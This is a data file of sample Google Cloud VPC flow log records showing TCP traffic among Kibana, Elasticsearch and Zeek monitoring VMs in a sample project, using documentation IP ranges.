-{"insertId":"1gq7q7afe373f2","jsonPayload":{"bytes_sent":"1464","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"203.0.113.27","src_port":50364},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:40:08.797851544Z","packets_sent":"9","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:40:08.412738626Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"}
-{"insertId":"1gq7q7afe373ee","jsonPayload":{"bytes_sent":"1784","connection":{"dest_ip":"203.0.113.27","dest_port":50364,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:40:08.797851544Z","packets_sent":"8","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.412738626Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"}
-{"insertId":"1gq7q7afe373ey","jsonPayload":{"bytes_sent":"1457","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"203.0.113.27","src_port":33126},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:44:50.919744677Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:44:50.809605761Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"}
-{"insertId":"1gq7q7afe373e7","jsonPayload":{"bytes_sent":"73215","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.58","src_port":65318},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.220599950Z","packets_sent":"747","reporter":"DEST","rtt_msec":"96","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:40:00.760345858Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"}
-{"insertId":"1gq7q7afe373f8","jsonPayload":{"bytes_sent":"1781","connection":{"dest_ip":"203.0.113.12","dest_port":53096,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:43:20.813699795Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:43:20.700692281Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"}
-{"insertId":"1gq7q7afe373ec","jsonPayload":{"bytes_sent":"176465","connection":{"dest_ip":"10.87.40.76","dest_port":33570,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821302149Z","packets_sent":"65","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.466779642Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_nam
e":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} -{"insertId":"1gq7q7afe373f5","jsonPayload":{"bytes_sent":"1776","connection":{"dest_ip":"203.0.113.27","dest_port":33126,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:44:50.919744677Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:44:50.809605761Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} -{"insertId":"1gq7q7afe373f6","jsonPayload":{"bytes_sent":"1458","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"198.51.100.107","src_port":56478},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:47:20.566586739Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:47:20.450631492Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} 
-{"insertId":"1gq7q7afe373fo","jsonPayload":{"bytes_sent":"32764","connection":{"dest_ip":"198.51.100.88","dest_port":52430,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"zeek-nsm","zone":"us-central1-a"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:53.081386115Z","packets_sent":"228","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:07.968717244Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} 
-{"insertId":"1gq7q7afe373ek","jsonPayload":{"bytes_sent":"1780","connection":{"dest_ip":"203.0.113.27","dest_port":34536,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:47:51.162931667Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:47:51.050074134Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} -{"insertId":"1gq7q7afe373fj","jsonPayload":{"bytes_sent":"137855","connection":{"dest_ip":"10.87.40.76","dest_port":33572,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821291282Z","packets_sent":"72","reporter":"DEST","rtt_msec":"2","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.466742414Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_nam
e":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} -{"insertId":"1gq7q7afe373fm","jsonPayload":{"bytes_sent":"125197","connection":{"dest_ip":"10.87.40.76","dest_port":33540,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.789258875Z","packets_sent":"242","reporter":"DEST","rtt_msec":"2","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500483335Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} 
-{"insertId":"1gq7q7afe373eg","jsonPayload":{"bytes_sent":"917832","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"198.51.100.88","src_port":53096},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.219496168Z","packets_sent":"230","reporter":"DEST","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"zeek-nsm","zone":"us-central1-a"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:01.853096315Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} 
-{"insertId":"1gq7q7afe373fc","jsonPayload":{"bytes_sent":"55572","connection":{"dest_ip":"198.51.100.88","dest_port":53096,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"zeek-nsm","zone":"us-central1-a"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.219496168Z","packets_sent":"133","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:01.853096315Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} 
-{"insertId":"1gq7q7afe373eq","jsonPayload":{"bytes_sent":"4615","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33966},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821049800Z","packets_sent":"75","reporter":"DEST","rtt_msec":"0","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:20.510698570Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} 
-{"insertId":"1gq7q7afe373ev","jsonPayload":{"bytes_sent":"75612","connection":{"dest_ip":"203.0.113.58","dest_port":65318,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.220599950Z","packets_sent":"583","reporter":"SRC","rtt_msec":"96","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.760345858Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} -{"insertId":"1gq7q7afe373em","jsonPayload":{"bytes_sent":"1461","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"203.0.113.27","src_port":34536},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:47:51.162931667Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:47:51.050074134Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} 
-{"insertId":"1gq7q7afe373ew","jsonPayload":{"bytes_sent":"1780","connection":{"dest_ip":"198.51.100.107","dest_port":56478,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:47:20.566586739Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:47:20.450631492Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} -{"insertId":"1gq7q7afe373e9","jsonPayload":{"bytes_sent":"64140","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33694},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565311154Z","packets_sent":"371","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:05.566359759Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_n
ame":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} -{"insertId":"1gq7q7afe373f9","jsonPayload":{"bytes_sent":"1458","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"203.0.113.12","src_port":53096},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:43:20.813699795Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:43:20.700692281Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} 
-{"insertId":"1gq7q7afe373f1","jsonPayload":{"bytes_sent":"231764","connection":{"dest_ip":"10.87.40.76","dest_port":33694,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565311154Z","packets_sent":"251","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:05.566359759Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} 
-{"insertId":"1gq7q7afe373ff","jsonPayload":{"bytes_sent":"107878","connection":{"dest_ip":"203.0.113.58","dest_port":65276,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.220621567Z","packets_sent":"614","reporter":"SRC","rtt_msec":"156","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.760349279Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} -{"insertId":"1gq7q7afe373fq","jsonPayload":{"bytes_sent":"595838","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"198.51.100.88","src_port":52430},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:53.081386115Z","packets_sent":"299","reporter":"DEST","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"zeek-nsm","zone":"us-central1-a"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:07.968717244Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sam
ple-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} -{"insertId":"14iipwlfd8t01n","jsonPayload":{"bytes_sent":"1780","connection":{"dest_ip":"198.51.100.107","dest_port":56410,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:47:10.630345069Z","packets_sent":"7","reporter":"SRC","rtt_msec":"37","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:47:10.514594429Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} 
-{"insertId":"14iipwlfd8t01j","jsonPayload":{"bytes_sent":"1781","connection":{"dest_ip":"192.0.2.117","dest_port":51950,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:41:50.757658840Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:41:50.645030007Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} -{"insertId":"14iipwlfd8t01o","jsonPayload":{"bytes_sent":"361966","connection":{"dest_ip":"203.0.113.134","dest_port":33876,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:37.933154111Z","packets_sent":"80","reporter":"SRC","rtt_msec":"34","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.466868771Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork
_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} -{"insertId":"14iipwlfd8t01p","jsonPayload":{"bytes_sent":"1457","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"192.0.2.117","src_port":51950},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:41:50.757658840Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:41:50.645030007Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} -{"insertId":"14iipwlfd8t01e","jsonPayload":{"bytes_sent":"1781","connection":{"dest_ip":"192.0.2.117","dest_port":58658,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:49:50.856250208Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:49:50.733935895Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} 
-{"insertId":"14iipwlfd8t01q","jsonPayload":{"bytes_sent":"1467","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"203.0.113.12","src_port":59924},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:41:08.213471928Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:41:08.092659117Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} 